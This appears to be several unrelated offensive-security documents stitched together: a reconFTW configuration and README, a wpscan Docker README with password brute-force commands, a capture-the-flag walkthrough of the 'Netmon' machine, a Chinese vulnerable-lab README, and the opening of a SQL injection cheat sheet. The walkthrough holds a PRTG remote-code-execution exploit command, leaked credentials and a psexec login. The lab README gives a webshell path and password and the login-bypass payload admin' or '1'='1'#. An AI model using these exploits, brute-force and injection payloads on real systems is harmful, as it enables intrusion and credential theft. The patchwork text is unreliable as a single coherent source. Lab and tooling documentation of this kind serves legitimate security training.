# Golang Vars (Comment or change on your own)
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH
# Tools config files
#NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define
AMASS_CONFIG=~/.config/amass/config.ini
GITHUB_TOKENS=${tools}/.github_tokens
#CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path
# APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line
#SHODAN_API_KEY="XXXXXXXXXXXXX"
#WHOISXML_API="XXXXXXXXXX"
#XSS_SERVER="XXXXXXXXXXXXXXXXX"
#COLLAB_SERVER="XXXXXXXXXXXXXXXXX"
#slack_channel="XXXXXXXX"
#slack_auth="xoXX-XXX-XXX-XXX"
# File descriptors
DEBUG_STD="&>/dev/null" # Skips STD output on installer
DEBUG_ERROR="2>/dev/null" # Skips ERR output on installer
# Osint
OSINT=true # Enable or disable the whole OSINT module
GOOGLE_DORKS=true
GITHUB_DORKS=true
GITHUB_REPOS=true
METADATA=true # Fetch metadata from indexed office documents
EMAILS=true # Fetch emails from differents sites
DOMAIN_INFO=true # whois info
REVERSE_WHOIS=true # amass intel reverse whois info, takes some time
IP_INFO=true # Reverse IP search, geolocation and whois
METAFINDER_LIMIT=20 # Max 250
# Subdomains
RUNAMASS=true
RUNSUBFINDER=true
SUBDOMAINS_GENERAL=true # Enable or disable the whole Subdomains module
SUBPASSIVE=true # Passive subdomains search
SUBCRT=true # crtsh search
SUBNOERROR=true # Check DNS NOERROR response and BF on them
SUBANALYTICS=true # Google Analytics search
SUBBRUTE=true # DNS bruteforcing
SUBSCRAPING=true # Subdomains extraction from web crawling
SUBPERMUTE=true # DNS permutations
PERMUTATIONS_OPTION=gotator # The alternative is "ripgen" (faster, not deeper)
GOTATOR_FLAGS="-depth 1 -numbers 3 -mindup -adv -md" # Flags for gotator
SUBTAKEOVER=false # Check subdomain takeovers, false by default cuz nuclei already check this
SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries
DEEP_RECURSIVE_PASSIVE=10 # Number of top subdomains for recursion
SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve
ZONETRANSFER=true # Check zone transfer
S3BUCKETS=true # Check S3 buckets misconfigs
REVERSE_IP=false # Check reverse IP subdomain search (set True if your target is CIDR/IP)
TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,992,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003"
INSCOPE=false # Uses inscope tool to filter the scope, requires .scope file in reconftw folder
# Web detection
WEBPROBESIMPLE=true # Web probing on 80/443
WEBPROBEFULL=true # Web probing in a large port list
WEBSCREENSHOT=true # Webs screenshooting
VIRTUALHOSTS=false # Check virtualhosts by fuzzing HOST header
NMAP_WEBPROBE=true # If disabled it will run httpx directly over subdomains list, nmap before web probing is used to increase the speed and avoid repeated requests
UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3001,3002,3003,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672"
# You can change to aquatone if gowitness fails, comment the one you don't want
AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot
# Host
FAVICON=true # Check Favicon domain discovery
PORTSCANNER=true # Enable or disable the whole Port scanner module
PORTSCAN_PASSIVE=true # Port scanner with Shodan
PORTSCAN_ACTIVE=true # Port scanner with nmap
CDN_IP=true # Check which IPs belongs to CDN
# Web analysis
WAF_DETECTION=true # Detect WAFs
NUCLEICHECK=true # Enable or disable nuclei
NUCLEI_SEVERITY="info,low,medium,high,critical" # Set templates criticity
NUCLEI_FLAGS="-silent -t ~/nuclei-templates/ -retries 2" # Additional nuclei extra flags, don't set the severity here but the exclusions like "-etags openssh"
NUCLEI_FLAGS_JS="-silent -tags exposure,token -severity info,low,medium,high,critical" # Additional nuclei extra flags for js secrets
URL_CHECK=true # Enable or disable URL collection
URL_CHECK_PASSIVE=true # Search for urls, passive methods from Archive, OTX, CommonCrawl, etc
URL_CHECK_ACTIVE=true # Search for urls by crawling the websites
URL_GF=true # Url patterns classification
URL_EXT=true # Returns a list of files divided by extension
JSCHECKS=true # JS analysis
FUZZ=true # Web fuzzing
CMS_SCANNER=true # CMS scanner
WORDLIST=true # Wordlist generation
ROBOTSWORDLIST=true # Check historic disallow entries on waybackMachine
PASSWORD_DICT=true # Generate password dictionary
PASSWORD_MIN_LENGTH=5 # Min password lenght
PASSWORD_MAX_LENGTH=14 # Max password lenght
# Vulns
VULNS_GENERAL=false # Enable or disable the vulnerability module (very intrusive and slow)
XSS=true # Check for xss with dalfox
CORS=true # CORS misconfigs
TEST_SSL=true # SSL misconfigs
OPEN_REDIRECT=true # Check open redirects
SSRF_CHECKS=true # SSRF checks
CRLF_CHECKS=true # CRLF checks
LFI=true # LFI by fuzzing
SSTI=true # SSTI by fuzzing
SQLI=true # Check SQLI with sqlmap
BROKENLINKS=true # Check for brokenlinks
SPRAY=true # Performs password spraying
COMM_INJ=true # Check for command injections with commix
PROTO_POLLUTION=true # Check for prototype pollution flaws
SMUGGLING=true # Check for HTTP request smuggling flaws
WEBCACHE=true # Check for HTTP request smuggling flaws
# Extra features
NOTIFICATION=false # Notification for every function
SOFT_NOTIFICATION=false # Only for start/end
DEEP=false # DEEP mode, really slow and don't care about the number of results
DEEP_LIMIT=500 # First limit to not run unless you run DEEP
DEEP_LIMIT2=1500 # Second limit to not run unless you run DEEP
DIFF=false # Diff function, run every module over an already scanned target, printing only new findings (but save everything)
REMOVETMP=false # Delete temporary files after execution (to free up space)
REMOVELOG=false # Delete logs after execution
PROXY=false # Send to proxy the websites found
SENDZIPNOTIFY=false # Send to zip the results (over notify)
PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans
FFUF_FLAGS="-mc all -fc 404 -ac -sf" # Ffuf flags
HTTPX_FLAGS="-follow-redirects -random-agent -status-code -silent -title -web-server -tech-detect -location" # Httpx flags for simple web probing
# HTTP options
HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Default header
# Threads
FFUF_THREADS=40
HTTPX_THREADS=50
HTTPX_UNCOMMONPORTS_THREADS=100
GOSPIDER_THREADS=20
BRUTESPRAY_THREADS=20
BRUTESPRAY_CONCURRENCE=10
GAU_THREADS=10
DNSTAKE_THREADS=100
DALFOX_THREADS=200
PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 means unlimited
PUREDNS_TRUSTED_LIMIT=400
PUREDNS_WILDCARDTEST_LIMIT=30
PUREDNS_WILDCARDBATCH_LIMIT=1500000
WEBSCREENSHOT_THREADS=200
GOWITNESS_THREADS=8
RESOLVE_DOMAINS_THREADS=150
PPFUZZ_THREADS=30
DNSVALIDATOR_THREADS=200
INTERLACE_THREADS=10
TLSX_THREADS=1000
XNLINKFINDER_DEPTH=3
# Rate limits
HTTPX_RATELIMIT=150
NUCLEI_RATELIMIT=150
FFUF_RATELIMIT=0
# Timeouts
AMASS_INTEL_TIMEOUT=15 # Minutes
AMASS_ENUM_TIMEOUT=180 # Minutes
CMSSCAN_TIMEOUT=3600 # Seconds
FFUF_MAXTIME=900 # Seconds
HTTPX_TIMEOUT=10 # Seconds
HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds
PERMUTATIONS_LIMIT=21474836480 # Bytes, default is 20 GB
# lists
fuzz_wordlist=${tools}/fuzz_wordlist.txt
lfi_wordlist=${tools}/lfi_wordlist.txt
ssti_wordlist=${tools}/ssti_wordlist.txt
subs_wordlist=${tools}/subdomains.txt
subs_wordlist_big=${tools}/subdomains_big.txt
resolvers=${tools}/resolvers.txt
resolvers_trusted=${tools}/resolvers_trusted.txt
# Axiom Fleet
# Will not start a new fleet if one exist w/ same name and size (or larger)
# AXIOM=false Uncomment only to overwrite command line flags
AXIOM_FLEET_LAUNCH=true # Enable or disable spin up a new fleet, if false it will use the current fleet with the AXIOM_FLEET_NAME prefix
AXIOM_FLEET_NAME="reconFTW" # Fleet's prefix name
AXIOM_FLEET_COUNT=5 # Fleet's number
AXIOM_FLEET_REGIONS="eu-central" # Fleet's region
AXIOM_FLEET_SHUTDOWN=true # # Enable or disable delete the fleet after the execution
# This is a script on your reconftw host that might prep things your way...
#AXIOM_POST_START="~/Tools/axiom_config.sh" # Useful to send your config files to the fleet
AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments
#AXIOM_EXTRA_ARGS="--rm-logs" # Example
# BBRF
BBRF_CONNECTION=false
BBRF_SERVER=https://demo.bbrf.me/bbrf
BBRF_USERNAME="user"
BBRF_PASSWORD="password"
# TERM COLORS
bred='\033[1;31m'
bblue='\033[1;34m'
bgreen='\033[1;32m'
byellow='\033[1;33m'
red='\033[0;31m'
blue='\033[0;34m'
green='\033[0;32m'
yellow='\033[0;33m'
reset='\033[0m'
```
</details>
# Usage:
> Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book:
**TARGET OPTIONS**
| Flag | Description |
|------|-------------|
| -d | Single Target domain *(example.com)* |
| -l | List of targets *(one per line)* |
| -m | Multiple domain target *(companyName)* |
| -x | Exclude subdomains list *(Out Of Scope)* |
| -i | Include subdomains list *(In Scope)* |
**MODE OPTIONS**
| Flag | Description |
|------|-------------|
| -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) |
| -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers |
| -p | Passive - Perform only passive steps |
| -a | All - Perform whole recon and all active attacks |
| -w | Web - Perform only vulnerability checks/attacks on particular target |
| -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) |
| -c | Custom - Launches specific function against target |
| -h | Help - Show this help menu |
**GENERAL OPTIONS**
| Flag | Description |
|------|-------------|
| --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) |
| -f | Custom config file path |
| -o | Output directory |
| -v | Axiom distributed VPS |
| -q | Rate limit in requests per second |
# Example Usage:
**To perform a full recon on single target**
```bash
./reconftw.sh -d target.com -r
```
**To perform a full recon on a list of targets**
```bash
./reconftw.sh -l sites.txt -r -o /output/directory/
```
**Perform full recon with more time intense tasks** *(VPS intended only)*
```bash
./reconftw.sh -d target.com -r --deep -o /output/directory/
```
**Perform recon in a multi domain target**
```bash
./reconftw.sh -m company -l domains_list.txt -r
```
**Perform recon with axiom integration**
```bash
./reconftw.sh -d target.com -r -v
```
**Perform all steps (whole recon + all attacks) a.k.a. YOLO mode**
```bash
./reconftw.sh -d target.com -a
```
**Show help section**
```bash
./reconftw.sh -h
```
# Axiom Support: :cloud:
![](https://i.ibb.co/Jzrgkqt/axiom-readme.png)
> Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version)
* As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time.
* During the configuration of axiom you need to select `reconftw` as provisoner.
* You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file.
# BBRF Support: :computer:
* To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials to reconftw.cfg file section dedicated to bbrf.
* During the execution of the scans the results will be added dynamically when each step ends.
* Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI.
# Sample video:
![Video](images/reconFTW.gif)
# :fire: Features :fire:
## Osint
- Domain information ([whois](https://github.com/rfc1036/whois) and [amass](https://github.com/OWASP/Amass))
- Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester) and [emailfinder](https://github.com/Josue87/EmailFinder))
- Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail))
- Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder))
- Google Dorks ([dorks_hunter](https://github.com/six2dez/dorks_hunter))
- Github Dorks ([gitdorks_go](https://github.com/damit5/gitdorks_go))
- GitHub org analysis ([enumerepo](https://github.com/trickest/enumerepo) and [trufflehog](https://github.com/trufflesecurity/trufflehog))
## Subdomains
- Passive ([amass](https://github.com/OWASP/Amass), [subfinder](https://github.com/projectdiscovery/subfinder) and [github-subdomains](https://github.com/gwen001/github-subdomains))
- Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr))
- NOERROR subdomain discovery ([dnsx](https://github.com/projectdiscovery/dnsx), more info [here](https://www.securesystems.de/blog/enhancing-subdomain-enumeration-ents-and-noerror/))
- Bruteforce ([puredns](https://github.com/d3mondev/puredns))
- Permutations ([Gotator](https://github.com/Josue87/gotator) and [ripgen](https://github.com/resyncgg/ripgen))
- JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider))
- DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx))
- Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships))
- TLS handshake ([tlsx](https://github.com/projectdiscovery/tlsx))
- Recursive search ([dsieve](https://github.com/trickest/dsieve)).
- Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei))
- DNS takeover ([dnstake](https://github.com/pwnesia/dnstake))
- DNS Zone Transfer ([dig](https://linux.die.net/man/1/dig))
- Cloud checkers ([S3Scanner](https://github.com/sa7mon/S3Scanner) and [cloud_enum](https://github.com/initstring/cloud_enum))
## Hosts
- IP info ([whoisxmlapi API](https://www.whoisxmlapi.com/)
- CDN checker ([ipcdn](https://github.com/six2dez/ipcdn))
- WAF checker ([wafw00f](https://github.com/EnableSecurity/wafw00f))
- Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [smap](https://github.com/s0md3v/Smap))
- Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb))
- Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray))
## Webs
- Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap))
- Web screenshoting ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness))
- Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git))
- CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK))
- Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gau](https://github.com/lc/gau), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA))
- URL patterns Search and filtering ([urless](https://github.com/xnl-h4ck3r/urless), [gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns))
- Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up))
- Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder), [getjswords](https://github.com/m4ll0k/BBTz))
- Fuzzing ([ffuf](https://github.com/ffuf/ffuf))
- URL sorting by extension
- Wordlist generation
- Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor))
## Vulnerability checks
- XSS ([dalfox](https://github.com/hahwul/dalfox))
- Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer))
- SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf))
- CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz))
- Cors ([Corsy](https://github.com/s0md3v/Corsy))
- LFI Checks ([ffuf](https://github.com/ffuf/ffuf))
- SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap))
- SSTI ([ffuf](https://github.com/ffuf/ffuf))
- SSL tests ([testssl](https://github.com/drwetter/testssl.sh))
- Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider))
- Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz))
- Web Cache Vulnerabilities ([Web-Cache-Vulnerability-Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner))
## Extras
- Multithreading ([Rush](https://github.com/shenwei356/rush))
- Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator))
- Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration
- Ansible + Terraform deployment over AWS
- Allows IP/CIDR as target
- Resume the scan from last performed step
- Custom output folder option
- All in one installer/updater script compatible with most distros
- Diff support for continuous running (cron mode)
- Support for targets with multiple domains
- Raspberry Pi/ARM support
- 6 modes (recon, passive, subdomains, web, osint and all)
- Out of Scope Support + optional [inscope](https://github.com/tomnomnom/hacks/tree/master/inscope) support
- Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support
# Mindmap/Workflow
![Mindmap](images/mindmapv2.png)
## Data Keep
Follow these simple steps to end up with a private repository with your `API Keys` and `/Recon` data.
* Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload)
* Clone your project: `git clone https://gitlab.com/example/reconftw-data`
* Get inside the cloned repository: `cd reconftw-data`
* Create a new branch with an empty commit: `git commit --allow-empty -m "Empty commit"`
* Add the official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example)
* Update upstream's repo: `git fetch upstream`
* Rebase current branch with the official one: `git rebase upstream/main master`
### Main commands:
* Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master`
* Update tool anytime: `git fetch upstream && git rebase upstream/main master`
## How to contribute:
If you want to contribute to this project, you can do it in multiple ways:
- Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request.
- Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script.
## Need help? :information_source:
- Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section.
- Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions.
- Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co)
## Support this project
### Buymeacoffee
[<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez)
### DigitalOcean referral link
<a href="https://www.digitalocean.com/?refcode=f362a6e193a1&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge"><img src="https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg" alt="DigitalOcean Referral Badge" /></a>
### GitHub sponsorship
[Sponsor](https://github.com/sponsors/six2dez)
# Sponsors ❤️
**This section shows the current financial sponsors of this project**
[<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian)
# Thanks :pray:
* Thank you for lending a helping hand towards the development of the project!
- [C99](https://api.c99.nl/)
- [CIRCL](https://www.circl.lu/)
- [NetworksDB](https://networksdb.io/)
- [ipinfo](https://ipinfo.io/)
- [hackertarget](https://hackertarget.com/)
- [Censys](https://censys.io/)
- [Fofa](https://fofa.info/)
- [intelx](https://intelx.io/)
- [Whoxy](https://www.whoxy.com/)
# Disclaimer
Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly.
The material contained in this repository is licensed under GNU GPLv3. |
wpscan
======
Docker image for [wpscan](http://wpscan.org/)
Usage with my image:
$ docker run --rm -it infoslack/dvwa --url www.example.com
If you want to generate the image:
$ git clone git@github.com:infoslack/sec-tools.git
$ cd sec-tools/wpscan
$ docker build -t wpscan .
You can create a bash wrapper for docker run commands in you `.bashrc`
or similar:
```bash
wpscan(){
docker run --rm -it \
-v /tmp/wpscan/cache:/wpscan/cache \
--log-driver none \
infoslack/wpscan "$@"
}
```
#### WPSCAN EXAMPLES
Do 'non-intrusive' checks...
$ wpscan --url www.example.com
Do wordlist password brute force on enumerated users using 50 threads...
$ wpscan --url www.example.com --wordlist darkc0de.lst --threads 50
Do wordlist password brute force on the 'admin' username only...
$ wpscan --url www.example.com --wordlist darkc0de.lst --username admin
Enumerate installed plugins...
$ wpscan --url www.example.com --enumerate p
Run all enumeration tools...
$ wpscan --url www.example.com --enumerate
Use custom content directory...
$ wpscan -u www.example.com --wp-content-dir custom-content
Update WPScan's databases...
$ wpscan --update
Debug output...
$ wpscan --url www.example.com --debug-output 2>debug.log
|
### IP
`10.10.10.152`
# Recon
### nmap
`nmap -sC -sV Netmon.nmap`
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 02:53 EST
Nmap scan report for 10.10.10.152
Host is up (0.049s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3m26s, deviation: 0s, median: 3m25s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-22T07:57:26
|_ start_date: 2020-11-22T07:55:18
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.26 seconds
```
* Looks like nmap found an ftp server and automatically showed us the directories
* We also have a web server running Indy httpd
* We also have smb running
# Exploitation
### ftp
* This one was super easy.
* We can log in to the server with `ftp 10.10.10.152`.
We can log in anonymously with the `anonymous` username and no password
* Once we cd to `/Users/Public`
* Now, we can download the file with `get user.txt`.
* After that, we can just cat it on our own machine to get the user flag: `dd58ce67b49e15105e88096c8d9255a5`
### PRTG
* I did some digging and found [this](https://www.reddit.com/r/sysadmin/comments/835dai/prtg_exposes_domain_accounts_and_passwords_in/) reddit post, which explains that old version of PRTG store credentials in plaintext at `C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.bak`
* Downloading that file on the ftp server and runnning get on it will give us a file, which when examined a bit gives us this:
```xml
</dbcredentials>
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
<dbtimeout>
```
* Username: `prtgadmin`
* Password: `PrTg@dmin2018`
* Unfortunately, this password didn't work so I tried out a couple other years for the password
* `PrTg@dmin2019` worked
* Strangely it didn't work for me at first and I was getting really frustrated, but when I came back the next day (and I assume the machine was reset), it worked. So maybe reset the machine if you run into the same issue
* Now we can log in!
### privesc
* Now that we have the login credentials, I remembered that searchsploit had a module for authenticated remote code execution
* For some reason the one on my computer wasn't working, so I ended up copying the code from [here](https://www.exploit-db.com/exploits/46527) to `exploit.sh`
* It turns out we have to have some cookie information for the exploit to work. I just went into the `network` section of inspect element to get it.
* Here's the complete command: `./exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.1911846024.1606031704; _gid=GA1.4.667691852.1606031704; OCTOPUS1813713946=e0ExRkMzQzcxLUY3MzAtNDJBMS1BNEU2LTBDRjFDREExMEUzRn0;"`
* When that finishes executing, it gives the following output:
```
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
```
* A user in the administrators group with the username `pentest` and the password `P3nT3st!`
* After what must have been an hour of fiddling with tools, I finally figured out how to log in with the credentials
* [this](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) blog helped out a lot
* A script called `psexec` lets us log in with the command `python3 psexec.py pentest:'P3nT3st!'@10.10.10.152`
* Once in the machine, we can cd over to '\Users\Administrator\Desktop` and print the file with `more root.txt`
* The root flag is `3018977fb944bf1878f75b879fba67cc`
# Notes:
* I suggest reading [this](https://blog.rapid7.com/2013/03/09/psexec-demystified/) for a better understanding of psexec. It helped me a lot
|
<h1 align="center">Resolvers <a href="https://twitter.com/intent/tweet?text=Trickest%20Resolvers%20-%20The%20most%20exhaustive%20list%20of%20reliable%20DNS%20resolvers%0A%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fresolvers&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1>
<h3 align="center">The most exhaustive list of reliable DNS resolvers</h3>
- [resolvers.txt](resolvers.txt): A simple list of resolver IP addresses, which you can pass directly to your DNS enumeration tool.
- [resolvers-extended.txt](resolvers-extended.txt): All of the resolvers in `resolvers.txt` with additional information about each server, including the organization it belongs to, its country, and how many times it has been detected as valid. If a resolver is valid enough times, it may earn its place in the next file.
- [resolvers-trusted.txt](resolvers-trusted.txt): A list of trusted resolvers from organizations like Cloudflare, Google, etc. We recommend you use this list to re-validate the results you get with the main resolvers.
[<img src="./banner.png" />](https://trickest-access.paperform.co/)
## How it Works
A [Trickest](https://trickest.com) workflow creates an initial dataset of resolvers from various sources and then uses multiple instances of [dnsvalidator](https://github.com/vortexau/dnsvalidator) to validate and re-validate this dataset and make it as reliable as possible.
![Trickest Workflow](resolvers.png "Trickest Workflow - Resolvers")
### TB; DZ (Too big; didn't zoom)
- We collect the initial dataset from three sources:
- [The Public DNS Server List](https://public-dns.info/nameservers.txt)
- A list of provider DNS servers collected from [bass](https://github.com/Abss0x7tbh/bass/tree/master/resolvers) (Thanks, [Abss0x7tbh](https://github.com/Abss0x7tbh)).
- A community-maintained list of resolvers on [janmasarik/resolvers](https://github.com/janmasarik/resolvers) (Thanks, [janmasarik](https://github.com/janmasarik)).
- This mega list of resolvers is then `sort -u`d and split up into smaller chunks.
- Multiple instances of [dnsvalidator](https://github.com/vortexau/dnsvalidator) are created to validate the resolver lists in parallel (Huge thanks to [vortexau](https://github.com/vortexau) and [codingo](https://github.com/codingo)).
- Then we run another round of [dnsvalidator](https://github.com/vortexau/dnsvalidator) to weed out any false positives that survived the previous step.
- The final resolvers list is passed to a `whois` script (which uses [APNIC](https://www.apnic.net/)'s API) to find out the organization and country to which each resolver belong.
- In the end, the workflow counts the number of times it found each resolver to be valid throughout all the previous runs and writes the frequency data to `resolvers-extended.txt`.
- This workflow is scheduled to run constantly.
## Contribution
All contributions/ideas/suggestions are welcome! Feel free to create a new ticket via [GitHub issues](https://github.com/trickest/resolvers/issues), tweet at us [@trick3st](https://twitter.com/trick3st), or join the conversation on [Discord](https://discord.gg/7HZmFYTGcQ).
## Build your own workflows!
We believe in the value of tinkering. Sign up for a demo on [trickest.com](https://trickest.com) to customize this workflow to your use case, get access to many more workflows, or build your own from scratch!
[<img src="./banner.png" />](https://trickest-access.paperform.co/)
|
## 启动环境
```
docker-compose build
docker-compose up -d
```
## 漏洞一:
在/app下存在菜刀木马,可通过D盾扫描获得
地址:http://127.0.0.1:8002/admin/trojan.php 密码:pass
## 漏洞二:
在http://127.0.0.1:8002/show.php?id=33存在sql注入漏洞,可以执行sqlmap -u "http://127.0.0.1:8002/show.php?id=33"
## 漏洞三:
在后台登录地址http://127.0.0.1:8002/admin/login.php 的用户名参数存在注入 利用万能密码admin' or '1'='1'#可以登录
|
# SQL injection
> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
Attempting to manipulate SQL queries may have goals including:
- Information Leakage
- Disclosure of stored data
- Manipulation of stored data
- Bypassing authorisation controls
## Summary
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
